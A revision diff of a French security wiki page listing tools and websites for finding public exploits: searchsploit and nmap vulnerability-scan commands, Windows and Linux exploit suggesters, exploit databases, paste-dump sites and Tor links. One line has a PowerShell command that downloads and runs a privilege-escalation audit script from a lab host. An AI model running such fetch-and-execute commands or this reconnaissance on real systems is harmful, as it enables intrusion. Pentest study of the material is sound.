Outils d'utilisateurs

Outils du Site


trouver_des_exploits_publique

Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

Lien vers cette vue

trouver_des_exploits_publique [2020/06/02 10:52]
M0N5T3R
trouver_des_exploits_publique [2023/10/01 22:32] (Version actuelle)
M0N5T3R
Ligne 6: Ligne 6:
 ============================= =============================
  
 +
 +**offline :**
 +
 +  * un outil comme searchsploit mais qui cherche sur exploit-db et https://github.com/nomi-sec/PoC-in-GitHub : https://github.com/usdAG/search_vulns 
   * SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf   * SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf
   * -> git clone https://github.com/offensive-security/exploit-database.git   * -> git clone https://github.com/offensive-security/exploit-database.git
   * -> apt update && apt -y install exploitdb   * -> apt update && apt -y install exploitdb
   * -> searchsploit -u #update   * -> searchsploit -u #update
-  * -> searchsploit "linux Kernel" #Example+  * -> searchsploit "linux Kernel"--exclude="(PoC)|/dos/" #Example
   * -> searchsploit apache mod_ssl #Other example   * -> searchsploit apache mod_ssl #Other example
   * -> searchsploit -m 7618 #Paste the exploit in current directory   * -> searchsploit -m 7618 #Paste the exploit in current directory
Ligne 16: Ligne 20:
   * -> searchsploit -x 7618[.c] #Open vi to inspect the exploit   * -> searchsploit -x 7618[.c] #Open vi to inspect the exploit
   * -> searchsploit --nmap file.xml #Search vulns inside an nmap xml result   * -> searchsploit --nmap file.xml #Search vulns inside an nmap xml result
 +  * -> searchsploit openssh 3 --color| grep -i 'openssh 3.' #This example filter the result 
 +  * -> nmap --min-rate 200 -p- 10.10.10.93 -oX resultat.xml
 +  * -> searchsploit -x --nmap resultat.xml
 +
 +
  
   * MSF-Search   * MSF-Search
Ligne 21: Ligne 30:
  
   * Nmap vulners   * Nmap vulners
-  * nmap --script nmap-vulners -sV 127.0.0.1 -p 443+  * -> nmap --script nmap-vulners -sV 127.0.0.1 -p 443
  
 +
 +  * Nmap vuln
 +  * -> nmap -Pn -n -sV -oN vulnnmapoutput.txt --script vuln 127.0.0.1
 +
 +  * Sherlock , PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
 +  * -> https://github.com/rasta-mouse/Sherlock
 +  * -> powershell "IEX(New-Object Net.Webclient).downloadString('http://10.10.14.13:3001/Sherlock.ps1'); Find-AllVulns"
 +  * ->  attend quelque minutes
 +
 +
 +  * Windows Exploit Suggester 
 +  * -> git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
 +  * -> pip install xlrd --upgrade
 +  * -> apt install python3-xlrd
 +  * -> ./windows-exploit-suggester.py --update
 +  * -> python windows-exploit-suggester.py --database 2020-07-27-mssb.xls --systeminfo sysinfo.txt
 +
 +
 +
 +  * Windows Exploit Suggester - Next Generation (WES-NG)
 +  * -> git clone https://github.com/bitsadmin/wesng.git
 +  * -> python wes.py --update
 +  * -> python wes.py sysinfoTarget.txt 
 +  * List only vulnerabilities with exploits, excluding IE, Edge and Flash
 +  * -> wes.py systeminfo.txt --exploits-only --hide "Internet Explorer" Edge Flash
 +  * -> wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash
 +  * Only show vulnerabilities of a certain impact
 +  * -> wes.py systeminfo.txt - -impact "Remote Code Execution" 
 +  * -> wes.py systeminfo.txt -i "Remote Code Execution"
 +  * -> wes.py systeminfo.txt -i "Elevation of Privilege"
 +  * Only show vulnerabilities of a certain severity
 +  * -> wes.py systeminfo.txt --severity critical important
 +  * -> wes.py systeminfo.txt -s critical
 +
 +
 +  * Linux Exploit Suggester 2
 +  * -> git clone https://github.com/jondonas/linux-exploit-suggester-2
 +
 +  * LES: Linux privilege escalation auditing tool
 +  * -> git clone https://github.com/mzet-/linux-exploit-suggester
 +
 +
 +
 +**online :**
 +
 +  * https://cn-sec.com/?s=CVE
 +  * https://snyk.io/vuln
 +  * http://www.securityfocus.com/
 +  * https://www.cvedetails.com/
 +  * https://www.exploit-db.com/
 +  * https://www.exploit-db.com/google-hacking-database/
 +  * google
 +  * -> firefox --search "Microsoft Edge site:exploit-db.com"
 +  * -> firefox --search "Microsoft Edge site:exploit-db.com" inurl:exploits intext:remote intitle:Browser
   * https://srcincite.io/exploits/   * https://srcincite.io/exploits/
   * https://www.exploitalert.com/   * https://www.exploitalert.com/
   * https://github.com/qazbnm456/awesome-cve-poc    * https://github.com/qazbnm456/awesome-cve-poc 
   * https://github.com/yeahhub/awesome-cve-poc   * https://github.com/yeahhub/awesome-cve-poc
-  * https://www.exploit-db.com/ 
-  * https://www.exploit-db.com/google-hacking-database/ 
   * https://vulners.com/   * https://vulners.com/
   * https://sploitus.com/   * https://sploitus.com/
Ligne 39: Ligne 100:
   * -> https://pastebeen.com     * -> https://pastebeen.com  
   * -> https://psbdmp.cc/ https://psbdmp.ws/    * -> https://psbdmp.cc/ https://psbdmp.ws/ 
-  * https://www.cvedetails.com/ 
-  * https://google/ 
   * Tor    * Tor 
   * -> http://xmh57jrzrnw6insl.onion/   * -> http://xmh57jrzrnw6insl.onion/
   * -> http://hss3uro2hsxfogfq.onion/   * -> http://hss3uro2hsxfogfq.onion/
   * -> http://gjobqjj7wyczbqie.onion/   * -> http://gjobqjj7wyczbqie.onion/
-  * -> Ahmia.fi+  * -> https://ahmia.fi/
   * https://threatpost.com/   * https://threatpost.com/
   * https://www.deepdotweb.com/   * https://www.deepdotweb.com/
   * https://packetstormsecurity.com/   * https://packetstormsecurity.com/
-  * https://www.cvedetails.com/ 
   * http://routerpwn.com/   * http://routerpwn.com/
   * https://www.rapid7.com/db/   * https://www.rapid7.com/db/
-  * http://0day.today/+  * http://0day.today/ **non recommandé** [[https://forum.zenk-security.com/showthread.php?tid=2590|thread sur le forum]]
   * https://cve.mitre.org/cve/   * https://cve.mitre.org/cve/
   * http://www.exploitalert.com   * http://www.exploitalert.com
   * http://www.vulnerability-lab.com   * http://www.vulnerability-lab.com
-  * https://packetstormsecurity.com 
   * https://www.rapid7.com/db/   * https://www.rapid7.com/db/
   * http://it.0day.today   * http://it.0day.today
Ligne 64: Ligne 121:
   * https://www.kb.cert.org/vuls   * https://www.kb.cert.org/vuls
   * https://secunia.com/community/advisories/search/   * https://secunia.com/community/advisories/search/
-  * http://www.securityfocus.com/bid 
   * http://lwn.net/Vulnerabilities/   * http://lwn.net/Vulnerabilities/
   * https://www.owasp.org/index.php/Category:Vulnerability   * https://www.owasp.org/index.php/Category:Vulnerability
Ligne 73: Ligne 129:
   * http://www.intelligentexploit.com   * http://www.intelligentexploit.com
   * http://osvdb.org/   * http://osvdb.org/
-  * http://www.securityfocus.com/ 
-  * http://packetstormsecurity.com/  
   * https://wpvulndb.com/    * https://wpvulndb.com/ 
   * http://repwn.com/wiki.html   * http://repwn.com/wiki.html
   * https://www.vulncode-db.com/ Vulncode-DB - is a database for vulnerabilities and their corresponding source code if available.   * https://www.vulncode-db.com/ Vulncode-DB - is a database for vulnerabilities and their corresponding source code if available.
   * https://cveapi.com/ cveapi - free API for CVE data.   * https://cveapi.com/ cveapi - free API for CVE data.
 +  * http://securityvulns.com/
 +  * http://insecure.org/sploits_all.html
 +  * http://zerodayinitiative.com/advisories/published/
 +  * http://nmrc.org/pub/index.html
 +  * http://oval.mitre.org
  
  
- +**Finding more information regarding the exploit ** 
-**Write-up :** +  * http://www.cvedetails.com 
-  * https://github.com/ENOFLAG/writeups?files=1 +  * http://packetstormsecurity.org/files/cve/[CVE] 
-  * Writeup de bug bounty : https://bugbountypoc.com/ +  * http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE] 
-  * Writeup de bug bounty : https://pentester.land/list-of-bug-bounty-writeups.html +  * http://www.vulnview.com/cve-details.php?cvename=[CVE]
-  * Writeup de bug bounty : https://medium.com/bugbountywriteup+
-  * Writeup de bug bounty : https://pentester.land/list-of-bug-bounty-writeups. +
-  * Writeup de bug bounty : https://github.com/djadmin/awesome-bug-bounty +
-  * Writeup de HackTheBox : https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA +
-  * Writeup de HackTheBox : https://github.com/Hackplayers/hackthebox-writeups +
-  * Writeup de HackTheBox : https://veteransec.com/category/hack-the-box-write-ups/ +
-  * Writeup de HackTheBox : https://www.youtube.com/watch?v=mEKRKgbodyA&list=PLESA5tKaGeu6WYcnVHDENsr2S6d_14HNX +
-  * Writeup de hackthebox de VM retired https://0xdf.gitlab.io/ +
-  * Writeup de VulnHub :https://www.youtube.com/watch?v=7nk3xdWTnpI&list=PLESA5tKaGeu7u0uGn1yJ9IPx99l-JnKlx +
-  +
  
trouver_des_exploits_publique.1591087956.txt.gz · Dernière modification: 2020/06/02 10:52 par M0N5T3R